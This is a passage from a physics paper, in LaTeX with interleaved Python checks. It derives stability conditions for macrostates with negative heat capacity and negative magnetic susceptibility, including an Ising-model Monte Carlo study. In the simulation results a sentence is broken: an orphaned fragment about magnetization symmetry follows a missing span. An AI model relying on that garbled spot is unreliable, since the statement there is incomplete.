\left\langle \delta Q^{2}\right\rangle & \beta\left\langle \delta
Q\delta
V\right\rangle \\
\beta\left\langle \delta V\delta Q\right\rangle &
\beta^{2}\left\langle \delta V^{2}\right\rangle
\end{array}
\right) ,\\
\mathcal{M}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta Q\right\rangle &
\beta\left\langle
\delta\beta^{\omega}\delta V\right\rangle \\
\left\langle \delta p^{\omega}\delta Q\right\rangle &
\beta\left\langle \delta p^{\omega}\delta V\right\rangle
\end{array}
\right) ,
\end{array}
\label{fluid}%
\end{equation}
where $C_{p}=\left( \partial G/\partial T\right) _{p}$ and $\alpha
_{p}=V^{-1}\left( \partial V/\partial T\right) _{p}$ are the heat
capacity and the thermal expansion coefficient at constant pressure, while $K_{T}%
=-V^{-1}\left( \partial V/\partial p\right) _{T}$ is the
isothermal compressibility. The symmetry of the response matrix in
Eq.(\ref{fluid}) leads
to the thermodynamical identity:%
\begin{equation}
\left( \frac{\partial G}{\partial p}\right) _{T}=V-T\left(
\frac{\partial V}{\partial T}\right) _{p}.
\end{equation}
The corresponding expressions for a magnetic system with Enthalpy
$G=U-HM$ are directly derived from the previous results by
substituting $\left( V,p\right) \rightarrow\left( M,-H\right) $:%
\begin{equation}%
\begin{array}
[c]{c}%
\mathcal{R}=\left(
\begin{array}
[c]{cc}%
T^{2}C_{H} & T\left( \partial M/\partial T\right) _{H}-M\\
\left( \partial G/\partial H\right) _{T} & \beta\chi_{T}%
\end{array}
\right) ,\\
\mathcal{F}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta Q^{2}\right\rangle & \beta\left\langle \delta
Q\delta
M\right\rangle \\
\beta\left\langle \delta M\delta Q\right\rangle &
\beta^{2}\left\langle \delta M^{2}\right\rangle
\end{array}
\right) ,\\
\mathcal{M}=\left(
\begin{array}
[c]{cc}%
\left\langle \delta\beta^{\omega}\delta Q\right\rangle &
\beta\left\langle
\delta\beta^{\omega}\delta M\right\rangle \\
-\left\langle \delta H^{\omega}\delta Q\right\rangle &
-\beta\left\langle \delta H^{\omega}\delta M\right\rangle
\end{array}
\right) ,
\end{array}
\label{magnetic}%
\end{equation}
where $C_{H}=\left( \partial G/\partial T\right) _{H}$ is the heat
capacity at constant magnetic field and $\chi_{T}=\left( \partial
M/\partial H\right) _{T}$ the isothermal magnetic susceptibility.
The symmetry of the response
matrix in Eq.(\ref{magnetic}) leads to the thermodynamical identity:%
\begin{equation}
\left( \frac{\partial G}{\partial H}\right) _{T}=T\left(
\frac{\partial M}{\partial T}\right) _{H}-M.
\end{equation}
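As a sanity check, this identity can be verified symbolically for a simple model. The ideal two-level paramagnet used below, with $M=N\tanh(H/T)$ and $\left\langle G\right\rangle=-NH\tanh(H/T)$ from $Z=(2\cosh(\beta H))^{N}$, is an illustrative choice, not a model discussed in the text.

```python
import sympy as sp

T, H, N = sp.symbols('T H N', positive=True)

# ideal two-level paramagnet (illustrative model):
# Z = (2 cosh(H/T))^N  ->  <G> = -N H tanh(H/T),  M = N tanh(H/T)
G = -N * H * sp.tanh(H / T)
M = N * sp.tanh(H / T)

lhs = sp.diff(G, H)              # (dG/dH)_T
rhs = T * sp.diff(M, T) - M      # T (dM/dT)_H - M

assert sp.simplify(lhs - rhs) == 0   # the thermodynamical identity holds
```

Both sides evaluate to $-N\tanh(H/T)-NH\,\mathrm{sech}^{2}(H/T)/T$, so the difference vanishes identically.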
\subsection{Thermodynamic stability of macrostates with anomalous response functions}
A direct consequence of the extended equilibrium fluctuation-dissipation
theorem (\ref{gen.fdr}) is the set of \textit{conditions of thermodynamic
stability}, which can be compatible in this framework with the
existence of anomalous response functions. In the present
subsection, we discuss two simple application examples involving
macrostates with negative heat capacities, as well as a numerical test
involving macrostates with anomalous values of the isothermal
susceptibility of a paramagnetic system.
\subsubsection{Thirring's constraint:}
Let us first consider an equilibrium situation involving only the
conjugated thermodynamic pair energy-temperature. Since $\delta
X=0\Rightarrow\delta Q \equiv \delta U$, Eq.(\ref{gen.fdr}) reduces to
the generalized equilibrium fluctuation-dissipation relation
involving the heat capacity (\ref{unc}) already obtained in our
previous work \cite{vel-unc}. A simple way to implement the
existence of non-vanishing correlated fluctuations $\left\langle
\delta \beta^{\omega}\delta U\right\rangle$ is by considering a
thermal contact with a bath (B) having a finite heat capacity
$C_{B}>0$. Clearly, the bath experiences a temperature fluctuation
$\delta T_{B}$ when the system absorbs or releases an amount of
energy $\delta U$, $\delta T_{B}=-\delta U/C_{B}\Rightarrow
\left\langle \delta \beta_{B}\delta U\right\rangle\neq 0$.
Eq.(\ref{unc}) can be rephrased as follows:
\begin{equation}
\frac{CC_{B}}{C+C_{B}}=\beta^{2}\left\langle \delta
U^{2}\right\rangle
\end{equation}
after considering the Gaussian approximation
$\delta\beta_{B}=\beta^{2}\delta U/C_{B}$ (here $k_{B}\equiv1$).
Since the expectation value of the square dispersion of the energy
fluctuations $\left\langle \delta U^{2}\right\rangle$ is
nonnegative, the thermodynamic stability of macrostates with
negative heat capacities $C<0$ demands the applicability of the
following condition:
\begin{equation}\label{Thirring.eq}
\frac{CC_{B}}{C+C_{B}}>0\Rightarrow 0<C_{B}<|C|.
\end{equation}
This result is the same constraint derived by Thirring in the past
\cite{thir}. As already commented, the existence of anomalous
macrostates with negative heat capacities is a distinguishing feature
of many nonextensive systems. However, since the derivation of
Thirring's constraint (\ref{Thirring.eq}) demands the existence of a
thermal contact, such a stability condition is only applicable
to short-range interacting systems whose sizes are large enough to
dismiss the surface energy involved in their thermodynamic
interaction.
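Thirring's window (\ref{Thirring.eq}) can be checked numerically in a few lines; the value of $C$ below is arbitrary.

```python
import numpy as np

C = -5.0                                    # anomalous heat capacity, C < 0 (k_B = 1)
below = np.linspace(0.1, 4.9, 100)          # baths with 0 < C_B < |C|
above = np.linspace(5.1, 50.0, 100)         # baths with C_B > |C|

# beta^2 <dU^2> = C C_B / (C + C_B) must be positive for a stable macrostate
assert np.all(C * below / (C + below) > 0)  # inside Thirring's window: stable
assert np.all(C * above / (C + above) < 0)  # larger baths: unstable
```

A larger bath ($C_{B}>|C|$) would demand a negative energy variance, which is impossible, so the macrostate destabilizes.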
\subsubsection{Stability condition in an astrophysical
situation:}\label{astro.example} Let us now consider a paradigmatic
situation with long-range interactions: the astrophysical system
composed of a globular cluster (C) and its nearby galaxy (G). Let us
denote by $C_{C}$ and $C_{G}$ their respective heat capacities, with
$|C_{C}|\ll|C_{G}|$. At first glance, the galaxy could be
taken as a bath with a very large heat capacity, which naively
suggests that the thermo-statistical description of the globular
cluster could be performed with the help of the Gibbs' canonical
ensemble (\ref{can}). In this context, however, the usual exigency
of a \textit{thermal contact} fails as a consequence of the
long-range nature of gravitation.
Astronomers have known since the late 1800s that the attractive character
and power-law $1/r^{2}$ dependence of the gravitational interaction
favor a concentration of stars towards the inner regions of any
astrophysical structure and an increase of their kinetic energies
accompanied by a decrease of the total energy \cite{Eddington}, a tendency
stimulating the development of distribution profiles with a
\textit{core-halo structure} and negative heat capacities.
Consequently, it is a rule rather than an exception the fact that
the globular cluster and its nearby galaxy simultaneously exhibit
macrostates with negative heat capacities, $C_{C}<0$ and $C_{G}<0$.
Since Thirring's constraint (\ref{Thirring.eq}) cannot be satisfied,
and is moreover inapplicable in the present situation,
the energy associated with the thermodynamic interaction between the
globular cluster and the galaxy should play a fundamental role in
the thermodynamic stability.
To obtain a general idea about how the above mechanism works, let us
denote by $W_{G-C}$ the contribution to the total energy
$U_{T}=U_{G}+U_{C}+W_{G-C}$ accounting for the potential energy
$V_{G-C}$ associated with the gravitational interaction between
these systems, as well as the kinetic energy contributions of the
collective translational motion $T_{G-C}$:
\begin{equation}
W_{G-C}=T_{G-C}+V_{G-C}.
\end{equation}
In general, $W_{G-C}$ should be significantly smaller than the
internal energy of the galaxy $U_{G}$, but it could be comparable to
the internal energy of the globular cluster $U_{C}$, $|W_{G-C}|\sim
|U_{C}|\ll |U_{G}|$. Strictly speaking, the total energy $U_{T}$
changes as a consequence of gravitational influence of other
neighboring astrophysical structures and the evaporation of stars.
However, the composed system globular cluster-galaxy can arrive at a
certain \textit{quasi-stationary evolution} under its own relaxation
mechanisms (collisions, violent relaxation, etc. \cite{inChava}) and
the incidence of star evaporation, where $U_{T}$ changes at a very
slow rate, $\dot{U}_{T}\simeq 0$. Under these conditions, it is
possible to speak about the existence of a certain
\textit{metastable thermodynamic equilibrium} between the globular
cluster and its nearby galaxy, a fact that is manifested in the
observation of universal profiles such as de Vaucouleurs' law for
the surface brightness of elliptical galaxies and the
Michie-King profiles for the distribution of stars in the globular
clusters \cite{Binney}.
Due to the coupling between collective and internal degrees of
freedom, the energy contribution $W_{G-C}$ will depend on the
internal states of the globular cluster and its nearby galaxy, so
it can be expressed in terms of their respective internal energies
$(U_{G},U_{C})$ as well as some other collective variables $\sigma$
(their total masses, relative separation, etc.), $W_{G-C}\simeq
W(U_{G},U_{C};\sigma)$. Consequently, the cluster and galaxy
undergo, in general, a \textit{nonlinear energetic interchange}
during their thermodynamic interaction, $\Delta U_{G} \neq -\Delta
U_{C}$, since part of the energy $\Delta U_{G}$ transferred from the
galaxy towards the cluster is used to modify the interaction energy
$W_{G-C}$. Such a nonlinear interchange contrasts with the usual
thermal contact between a Gibbs' bath (B) and an extensive system
(S), where $\Delta U_{B} = -\Delta U_{S}$.
As a consequence of the separability as well as the small number of
degrees of freedom of the collective motions $N^{collective}_{G-C}$ in
comparison with the internal degrees of freedom of the galaxy
$N^{internal}_{G}$ and the globular cluster $N^{internal}_{C}$, the
distribution associated with the present situation can be
approximately given as the product of their respective densities of
states $\Omega_{G}$ and $\Omega_{C}$:
\begin{equation}
\rho(U_{C})\simeq A\Omega_{G}(U_{G})\Omega_{C}(U_{C}),
\end{equation}
where the internal energies $U_{G}$ and $U_{C}$ obey the constraint:
\begin{equation}
U_{T}=U_{G}+U_{C}+W_{G-C}\sim const,
\end{equation}
with $A$ being a normalization constant. Since the probabilistic
weight $\omega(U_{C})\sim\Omega_{G}(U_{G})$, the environment inverse
temperature (see definition in Eq.(\ref{eff.temp})) is given by:
\begin{equation}\label{eff.temp.astro}
\beta^{\omega}=-\left.\frac{\partial S_{G}(U_{G})}{\partial
U_{C}}\right|_{U_{T}}=\beta_{G}\alpha,
\end{equation}
where the subindex $U_{T}$ means that the partial derivation is
taken at constant total energy. In this last expression,
$\beta_{G}=\partial S_{G}(U_{G})/\partial U_{G}$ represents the
ordinary microcanonical inverse temperature of the galaxy and
$\alpha=\alpha(U_{C})$:
\begin{equation}
\alpha=-\left.\frac{\partial U_{G}}{\partial
U_{C}}\right|_{U_{T}}\equiv 1+\left.\frac{\partial W_{G-C}}{\partial
U_{C}}\right|_{U_{T}}=\alpha(U_{C}),
\end{equation}
a dimensionless factor that accounts for the underlying nonlinear
energetic interchange. Clearly, the inverse temperature
(\ref{eff.temp.astro}) is an \textit{effective concept} that
characterizes how the globular cluster \textit{feels} the
thermodynamic influence of the galaxy. Since in general $\alpha\neq
1$, the condition of thermal equilibrium $\beta^{\omega}=\beta_{C}$
implies that the microcanonical inverse temperatures of the galaxy
and the globular cluster are different, $\beta_{G}\neq\beta_{C}$.
Since the heat capacity of the galaxy $C_{G}$ is extremely large in
comparison with the heat capacity of the globular cluster $C_{C}$,
the inverse temperature $\beta_{G}$ can be taken as a constant
parameter. Thus, we can restrict ourselves to the thermal fluctuations
of the effective inverse temperature $\beta^{\omega}$ associated with
the nonlinear energetic interchange:
\begin{equation}
\delta\beta^{\omega}\simeq\beta_{G}\alpha'(U_{C})\delta U_{C}.
\end{equation}
By substituting this last approximation into the fluctuation-dissipation
relation (\ref{unc}) and considering the condition of thermal
equilibrium $\beta^{\omega}=\beta_{C}$, one obtains:
\begin{equation}
\frac{C_{C}}{1+(\alpha\beta_{C})^{-1}C_{C}\alpha'}=\beta^{2}_{C}\left\langle\delta
U^{2}_{C}\right\rangle.
\end{equation}
Since $\left\langle\delta U^{2}_{C}\right\rangle>0$, one arrives at
the following condition of thermodynamic stability:
\begin{equation}\label{astro.cond}
\beta_{C}C^{-1}_{C}+\alpha^{-1}\alpha'>0.
\end{equation}
According to the present result, a globular cluster with $C_{C}<0$
can be found in a metastable thermodynamic equilibrium with its nearby
galaxy provided that the underlying nonlinear energetic interchange
associated with the interaction energy $W_{G-C}$ ensures the
applicability of the stability condition (\ref{astro.cond}).
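A quick numerical illustration of condition (\ref{astro.cond}), using hypothetical trial values: even with $C_{C}<0$, a sufficiently strong nonlinear interchange ($\alpha'>0$) renders the implied energy variance positive.

```python
beta_C, C_C = 1.0, -3.0      # cluster inverse temperature and negative heat capacity
alpha, alpha_p = 1.2, 0.5    # hypothetical alpha(U_C) and its derivative alpha'(U_C)

# stability condition (astro.cond): beta_C/C_C + alpha'/alpha > 0
assert beta_C / C_C + alpha_p / alpha > 0

# the energy variance implied by the fluctuation relation is then positive:
var_U = C_C / (beta_C**2 * (1 + C_C * alpha_p / (alpha * beta_C)))
assert var_U > 0
```

With $\alpha'=0$ (linear interchange) the same numbers would give a negative variance, signaling instability.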
\subsubsection{Anomalous response in paramagnetic
systems:}\label{2DIsing} Besides long-range interacting systems
such as the astrophysical example previously discussed, the existence of
macrostates with negative heat capacities is a relevant feature
indicating the occurrence of a \textit{discontinuous} (first-order)
\textit{phase transition} in a mesoscopic short-range interacting
system \cite{gro1}. The observation of anomalies in discontinuous
phase transitions is not restricted to the heat capacity: other
response functions can exhibit anomalous values too
\cite{Hugo}. In fact, their presence could be the origin of the
sudden change experienced by a given physical observable $X$ under a
small variation of its conjugated control parameter $Y$ below the
critical temperature $T_{c}$.
A typical example is found in a magnetic system, involving the
magnetization $M$ and the external magnetic field $H$. The sudden
inversion of magnetization $M\mapsto-M$ with $M\neq 0$, observed
around the value $H=0$ below the critical temperature $T_{c}$, is
a consequence of the existence of unstable diamagnetic states with
$\chi_{T}<0$. Such states are anomalous for magnetic materials
undergoing a paramagnetic-ferromagnetic phase transition in those
equilibrium situations where the fluctuation-dissipation relation
$\chi_{T}=\beta\left\langle\delta M^{2}\right\rangle$ is supposed to
be relevant, and the inequality $\chi_{T}>0$ arises as the ordinary
stability condition.
Let us consider again a magnetic system with internal energy $U$ and
magnetization $M$. As already shown in this work, the corresponding
form of the generalized equilibrium fluctuation-dissipation
relations $\mathcal{R}=\mathcal{F}+\mathcal{RM}$ is specified by the
matrices of Eq.(\ref{magnetic}). For the sake of simplicity, let us
restrict ourselves to a particular equilibrium situation where the
temperature of the environment $\beta^{\omega}$ takes a constant value
$\beta$, but the external magnetic field $H^{\omega}$ acting on the
magnetic system undergoes non-vanishing thermal fluctuations
$\left\langle\delta H^{\omega}\delta M\right\rangle\neq 0$.
The simplest way to implement the above behavior is by admitting the
existence of small thermodynamic fluctuations of the magnetic field
$H^{\omega}$ around a constant value $H$, coupled to the total
magnetization of the system:
\begin{equation}\label{ans.mag}
H^{\omega}=H-\lambda\delta M/N,
\end{equation}
where $N$ is the system size and $\lambda$ a suitable coupling
constant. The general equilibrium fluctuation-dissipation relation
involving the isothermal magnetic susceptibility $\chi_{T}$:
\begin{equation}
\beta\chi_{T} =\beta^{2}\left\langle \delta M^{2}\right\rangle
+\left( T\left( \partial M/\partial T\right) _{H}-M\right)
\beta\left\langle \delta\beta^{\omega}\delta M\right\rangle
-\beta^{2}\chi_{T}\left\langle \delta H^{\omega}\delta M\right\rangle
\label{iso.sus}%
\end{equation}
reduces to:
\begin{equation}
\beta\chi_{T}=\beta^{2}\left\langle \delta M^{2}\right\rangle -\beta^{2}%
\chi_{T}\left\langle \delta H^{\omega}\delta M\right\rangle
\end{equation}
in the present equilibrium situation, which can be rewritten as
follows:
\begin{equation}\label{iso.sus2}
\beta\left\langle \delta M^{2}\right\rangle
=\frac{\chi_{T}}{1+\lambda\chi _{T}/N}.
\end{equation}
Since the square dispersion of the magnetization is positive,
$\left\langle \delta M^{2}\right\rangle >0$, the anomalous
macrostates with negative values of the isothermal magnetic
susceptibility $\chi_{T}<0$ are thermodynamically stable when the
condition:
\begin{equation}\label{mag.cond}
\lambda+N/\chi_{T}>0
\end{equation}
holds. Eq.(\ref{iso.sus2}) can also be used to obtain the dispersion
of the external magnetic field $H^{\omega}$:
\begin{equation}\label{iso.sus3}
\left\langle (\delta
H^{\omega})^{2}\right\rangle=\frac{1}{N^{2}}\lambda^{2}\left\langle
\delta
M^{2}\right\rangle=\frac{1}{N\beta}\lambda^{2}\frac{\chi_{T}/N}{1+\lambda\chi
_{T}/N}.
\end{equation}
Since $\chi_{T}$ grows with $N$ in general as $\chi_{T}\propto N$,
the dispersions of the magnetization and the external magnetic field
behave as $\left\langle \delta M^{2}\right\rangle\propto N$ and
$\left\langle (\delta H^{\omega})^{2}\right\rangle\propto 1/N$. When
the system size $N$ is large enough, the fluctuations of the
external magnetic field $H^{\omega}$ are very small. From the
viewpoint of thermodynamics (where thermal fluctuations are
dismissed due to the large size of conventional thermodynamic
systems), the present equilibrium does not differ from conventional
situations where the external magnetic field is assumed to be
constant. However, it is easy to see that both the fluctuating
behavior accounted for by expressions (\ref{iso.sus2}) and
(\ref{iso.sus3}), as well as the stability condition (\ref{mag.cond}),
crucially depend on the external conditions imposed on the system,
which are specified here by the coupling constant $\lambda$.
According to the stability condition (\ref{mag.cond}), macrostates
with negative isothermal susceptibilities can be found in a stable
equilibrium with an appropriate choice of the coupling constant
$\lambda$. Moreover, the fluctuation relation (\ref{iso.sus2}) can also
be used to obtain the isothermal magnetic susceptibility per particle
$\bar{\chi}_{T}=\chi_{T}/N$ in terms of the fluctuating behavior of the
magnetization:
\begin{equation}
\bar{\chi}_{T}^{-1}=\frac{1+\beta\left\langle \delta
H^{\omega}\delta M\right\rangle }{\beta\left\langle \delta
M^{2}\right\rangle }N\equiv
\frac{1-\lambda\beta\sigma_{m}^{2}}{\beta\sigma_{m}^{2}},
\end{equation}
where $\sigma_{m}^{2}=\left\langle \delta M^{2}\right\rangle /N$
represents the thermal dispersion of magnetization.
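As an illustration of this estimator, one can generate synthetic Gaussian magnetization fluctuations with the dispersion predicted by Eq.(\ref{iso.sus2}) for an anomalous $\bar{\chi}_{T}<0$ and recover the susceptibility from the samples. All numeric values below are hypothetical.

```python
import numpy as np

rng = np.random.default_rng(1)
beta, lam, N = 0.46, 0.8, 625        # inverse temperature, coupling, size (L = 25)

chi_bar_true = -2.0                  # hypothetical anomalous susceptibility per spin
# Eq. (iso.sus2): sigma_m^2 = <dM^2>/N = chi_bar / (beta*(1 + lam*chi_bar))
sigma_m2 = chi_bar_true / (beta * (1 + lam * chi_bar_true))
assert sigma_m2 > 0                  # stability condition lam + 1/chi_bar > 0 holds

# synthetic Gaussian magnetization fluctuations with that dispersion
dM = rng.normal(0.0, np.sqrt(N * sigma_m2), size=200_000)
s2 = dM.var() / N                    # measured sigma_m^2

# invert the estimator chi_bar^{-1} = (1 - lam*beta*s2)/(beta*s2)
chi_bar_est = beta * s2 / (1 - lam * beta * s2)
assert abs(chi_bar_est - chi_bar_true) < 0.1
```

Note that a naive canonical estimate $\beta s^{2}$ would return a positive number here; only the corrected estimator recovers the negative susceptibility.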
\begin{figure}
[t]
\begin{center}
\includegraphics[
height=4.7in, width=3.4in
]%
{anomalous.eps}%
\caption{Isotherms of the 2D Ising model with $L=25$ derived from
Metropolis Monte Carlo simulations using the acceptance
probability (\ref{as.met}): Panel a) magnetic field $\left\langle
H^{\omega}\right\rangle $ \textit{versus} magnetization
$\left\langle m\right\rangle $; Panel b) inverse isothermal magnetic
susceptibility $\bar{\chi}_{T}^{-1}$ \textit{versus} magnetization
$\left\langle m\right\rangle $. The labels in both panels indicate
the value
of $\beta$ for the corresponding isotherm.}%
\label{anomalous.eps}%
\end{center}
\end{figure}
Admittedly, we do not know how the external magnetic influence expressed
in Eq.(\ref{ans.mag}) could be implemented in a real experimental
situation. Fortunately, its consequences are very easy to check
with the help of Monte Carlo simulations. Let us consider the well-known
2D Ising model on an $L\times L$ square lattice with periodic
boundary conditions:
\begin{equation}
U=-\sum_{\left\langle ij\right\rangle }s_{i}s_{j},~M=\sum_{i}s_{i},
\end{equation}
where the sum $\left\langle ij\right\rangle $ considers
nearest-neighbor interactions only, and the spin variables
$s_{i}=\pm1$. The above equilibrium conditions can be easily
implemented by using a Metropolis method with acceptance probability
$p=p\left( U,M\left\vert U+\Delta U,M+\Delta M\right. \right) $:
\begin{equation}
p=\min\left\{ 1,\exp\left[ -\beta\Delta U+\beta H^{\omega}\Delta
M\right] \right\} ,\label{as.met}%
\end{equation}
which is a particular expression of Eq.(\ref{met.b}). Denoting by
$m=M/N$ the magnetization per particle, the external magnetic field
in this study is given by $H^{\omega}=\bar{H}-\lambda\left(
m-\bar{m}\right) $ in accordance with Eq.(\ref{ans.mag}), where
$\bar{m}$ and $\bar{H}$ are suitable estimates of the expectation
values $\left\langle m\right\rangle $ and $\left\langle
H^{\omega}\right\rangle $. Our interest is to obtain the isotherms
of the 2D Ising model within the anomalous regions with
$\chi_{T}<0$. Thus, the values of the parameters $\left(
\bar{H},\bar{m}\right) $ can be iteratively provided by using the
isothermal magnetic susceptibility per particle $\bar{\chi}_{T}$ of
a previous simulation through the expression:
\begin{equation}
\bar{H}_{i+1}=\bar{H}_{i}+\left( \bar{\chi}_{T}\right)
_{i}^{-1}\left(
\bar{m}_{i+1}-\bar{m}_{i}\right) ,\label{ser}%
\end{equation}
where the step $\Delta m=\bar{m}_{i+1}-\bar{m}_{i}$ should be small.
The initial value $\bar{m}_{0}$ is assumed to be the average
magnetization obtained from an ordinary Metropolis Monte Carlo
simulation with $H^{\omega }=\bar{H}_{0}\sim const$
($\lambda\equiv0$) far enough from the unstable
region with $\chi_{T}<0$, $\bar{m}_{0}=\left\langle m\right\rangle $.%
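A minimal sketch of such a Metropolis scheme (not the authors' original code; the lattice size, seed, and the values of $\lambda$, $\bar{H}$, $\bar{m}$ are merely illustrative) follows the ansatz of Eq.(\ref{ans.mag}):

```python
import numpy as np

rng = np.random.default_rng(2)
L = 8                              # small lattice for illustration (the text uses L = 25)
beta, lam = 0.46, 1.0              # inverse temperature and coupling constant
H_bar, m_bar = 0.05, 0.6           # hypothetical estimates of <H^w> and <m>

s = rng.choice([-1, 1], size=(L, L))

def metropolis_sweep(s):
    """One sweep of single-spin-flip Metropolis with the fluctuating field
    H^w = H_bar - lam*(m - m_bar), acceptance min{1, exp[-b dU + b H^w dM]}."""
    for _ in range(L * L):
        i, j = rng.integers(L, size=2)
        nn = s[(i + 1) % L, j] + s[(i - 1) % L, j] \
           + s[i, (j + 1) % L] + s[i, (j - 1) % L]
        dU = 2 * s[i, j] * nn                     # energy change of flipping (i, j)
        dM = -2 * s[i, j]                         # magnetization change
        H_w = H_bar - lam * (s.mean() - m_bar)    # field fluctuating with m
        if rng.random() < min(1.0, np.exp(-beta * dU + beta * H_w * dM)):
            s[i, j] = -s[i, j]

for _ in range(300):                              # thermalization sweeps
    metropolis_sweep(s)

samples = []
for _ in range(400):                              # measurement sweeps
    metropolis_sweep(s)
    samples.append(s.mean())
m_avg = float(np.mean(samples))
assert -1.0 <= m_avg <= 1.0
```

Combined with the iterative update (\ref{ser}) of $(\bar{H},\bar{m})$ between runs, sweeps of this kind allow the anomalous branch of the isotherm to be traced.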
\begin{figure}
[t]
\begin{center}
\includegraphics[
height=2.5in, width=3.4in
]%
{comparison.eps}%
\caption{Isotherms for $L=25$ and $\beta=0.46$ obtained from
Metropolis Monte Carlo simulations based on the Boltzmann-Gibbs
distributions (BG) where $H^{\omega}=H\sim
const\rightarrow\left\langle \delta H^{\omega}\delta M\right\rangle
=0$ and the present Metropolis Monte Carlo simulations with
$\left\langle \delta H^{\omega}\delta M\right\rangle \not =0$.}%
\label{comparison.eps}%
\end{center}
\end{figure}
Although any real value of the coupling constant $\lambda$ satisfying
the stability condition (\ref{mag.cond}) is admissible, it is desirable
to impose some criterion in order to reduce the thermal dispersions of
the system magnetization (\ref{iso.sus2}) and the external magnetic
field (\ref{iso.sus3}). Our interest is to obtain the isotherms in
the $H-M$ diagram, and hence, an optimal value of $\lambda$ can be
chosen in order to minimize the total dispersion
$\sigma^{2}=\sigma_{H}^{2}+\sigma_{m}^{2}$, where:
\begin{equation}
\sigma_{H}^{2}=N\left\langle \left(\delta
H^{\omega}\right)^{2}\right\rangle
\end{equation}
is the thermal dispersion of the external magnetic field. The
analysis yields:
\begin{equation}
\lambda_{op}=\sqrt{a^{2}+1}-a,
\end{equation}
where $a$ is the inverse of the isothermal magnetic susceptibility
per particle, $a=\bar{\chi}_{T}^{-1}$, whose value can be estimated
from the previous simulation, as in the case of the parameters $\left(
\bar{H},\bar{m}\right) $ in Eq.(\ref{ser}). Notice that this optimal
value guarantees the validity of stability condition
(\ref{mag.cond}).
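The closed-form optimum can be cross-checked against a direct numerical minimization of $\sigma^{2}(\lambda)=(1+\lambda^{2})\sigma_{m}^{2}$, which follows from Eqs.(\ref{iso.sus2}) and (\ref{iso.sus3}); the values of $\beta$ and $\bar{\chi}_{T}$ below are illustrative.

```python
import numpy as np

beta = 0.46
chi_bar = -2.0                         # hypothetical anomalous susceptibility per spin
a = 1.0 / chi_bar                      # a = chi_bar^{-1}

lam = np.linspace(0.51, 5.0, 100_000)  # admissible couplings: lam + 1/chi_bar > 0
# sigma^2 = (1 + lam^2) * sigma_m^2, with sigma_m^2 from Eq. (iso.sus2):
sigma2 = (1 + lam**2) * chi_bar / (beta * (1 + lam * chi_bar))

lam_op = np.sqrt(a**2 + 1) - a         # the closed-form optimum quoted above
assert abs(lam[np.argmin(sigma2)] - lam_op) < 1e-3
assert lam_op + a > 0                  # the optimum satisfies (mag.cond)
```

For this choice of $\bar{\chi}_{T}$ the grid minimum lands at $\lambda_{op}=(1+\sqrt{5})/2\approx1.618$, matching the formula.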
Results of extensive Monte Carlo simulations using the procedure
explained above are shown in FIG.\ref{anomalous.eps}. We have used a
square lattice with $L=25$ and considered $n=10^{6}$ iterations for
each calculated point. These results clearly reveal the presence of
anomalous diamagnetic states $\bar{\chi}_{T}<0$ for
inverse temperatures $\beta$ above the critical point $\beta_{c}^{L=25}%
\simeq0.41$.
m\right\rangle
>0$ due to the underlying symmetry $M\rightarrow-M$ and $H\rightarrow-H$ of
the enthalpy $G=U-HM$.
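For orientation, a minimal single-spin-flip Metropolis sketch of the constant-field case $\lambda=0$ (the Boltzmann-Gibbs baseline referred to in FIG.~\ref{comparison.eps}) could look as follows. All parameter values and names here are illustrative assumptions: the runs reported in the text use $L=25$ and $n=10^{6}$ iterations per point, and the fluctuating-field simulations additionally couple $H^{\omega}$ to the magnetization, which this sketch does not implement.

```python
import math
import random

def metropolis_ising_2d(L=8, beta=0.46, H=0.1, sweeps=200, seed=1):
    """Single-spin-flip Metropolis for the 2D Ising model in a *constant*
    external field H (the lambda = 0 case).  Returns the time-averaged
    magnetization per spin, measured over the second half of the run."""
    rng = random.Random(seed)
    s = [[1] * L for _ in range(L)]          # start fully magnetized
    m_acc, n_meas = 0.0, 0
    for sweep in range(sweeps):
        for _ in range(L * L):
            i, j = rng.randrange(L), rng.randrange(L)
            nn = (s[(i + 1) % L][j] + s[(i - 1) % L][j] +
                  s[i][(j + 1) % L] + s[i][(j - 1) % L])
            dE = 2.0 * s[i][j] * (nn + H)    # energy cost of flipping s[i][j]
            if dE <= 0.0 or rng.random() < math.exp(-beta * dE):
                s[i][j] = -s[i][j]
        if sweep >= sweeps // 2:             # crude equilibration cut
            m_acc += sum(map(sum, s)) / (L * L)
            n_meas += 1
    return m_acc / n_meas
```

Below the critical point ($\beta>\beta_{c}$) and with $H>0$ this chain stays close to $\left\langle m\right\rangle \approx 1$; sweeping $H$ with such a constant-field chain produces the sudden jump at $H=0$ rather than the backbending branch.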
As clearly shown in FIG.\ref{comparison.eps}, while the 2D Ising
model isotherms are able to describe a backbending in the $H-M$
diagram under a magnetic influence obeying stability condition
(\ref{mag.cond}), they merely undergo a sudden jump in magnetization
around the point $H=0$ under the influence of a constant
magnetic field, that is, in the situation with $\lambda=0$. As already
commented, such a sudden jump is interpreted as the occurrence of a
discontinuous phase transition in conventional statistical
mechanics, whose existence is a direct manifestation of the presence
of an unstable branch with negative susceptibilities $\chi_{T}<0$.
Our Monte Carlo simulations show that such an anomalous region can
turn accessible with an appropriate selection of the external
experimental conditions. The present results can be extended to the
case of fluid systems. In fact, the behavior of the 2D Ising model
isotherms is fully analogous to the well-known backbending of the van
der Waals gas isotherms in the $p-V$ diagram, which is associated
with macrostates with negative isothermal compressibilities
$K_{T}<0$ \cite{Reichl}.
\section{Final remarks}
We have obtained in this work a generalization of equilibrium
fluctuation-dissipation relations compatible with the existence of
macrostates with anomalous response functions, Eq.(\ref{gfdr}). Such
a development has been carried out by starting from a generic
extension of the Boltzmann-Gibbs distribution and its control
thermodynamic parameters $\left( \beta,Y\right) $ that characterize
the external thermodynamic influence of an environment,
Eqs.(\ref{new}) and (\ref{eff.temp}). Since the environment
thermodynamic control parameters become, in general,
\textit{fluctuating quantities}, a new operational definition
(\ref{operational.def}) for the concept of response function has
been also considered. Remarkably, the physics behind the generalized
equilibrium fluctuation-dissipation relations (\ref{gfdr}) is quite
simple. The key ingredient is the fact that the environment
thermodynamic parameters $\left\{\beta^{e}_{i}\right\}$ undergo in
general correlated fluctuations with the system observables
$\left\{I^{i}\right\}$ as a consequence of the underlying
thermodynamic interaction. Such a realistic behavior, systematically
disregarded by the use of Boltzmann-Gibbs distributions
(\ref{bg.w}), leads to the consideration of a new correlation matrix
$\mathcal{M}$ in the equilibrium fluctuation-dissipation relations,
Eq.(\ref{A2.FR}), which characterizes the existence of these
correlative effects. The new theorem explicitly states that the
system fluctuating behavior and its thermodynamic stability
crucially depend on the nature of the external influence of the
environment.
As examples of applications, we have obtained particular expressions
